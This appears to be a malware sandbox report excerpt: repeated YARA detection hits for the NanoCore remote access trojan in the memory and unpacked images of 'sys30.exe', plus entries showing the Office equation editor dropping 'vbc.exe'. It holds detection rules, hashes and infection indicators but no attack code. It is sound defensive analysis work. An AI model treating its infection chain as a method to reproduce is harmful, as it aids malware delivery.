Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office equation editor drops PE fileShow sources
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.274d950.20.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.6a0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.377d06d.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.564629.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bb0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.9f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.38bc03e.28.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.ba0000.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.26ee188.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.560000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.740000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.396ce86.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.dd4c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.70000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3a7eed1.34.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.3964057.31.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.2759b98.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.397b2b6.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38e56c8.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bd0000.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.640000.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.38bd6a8.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
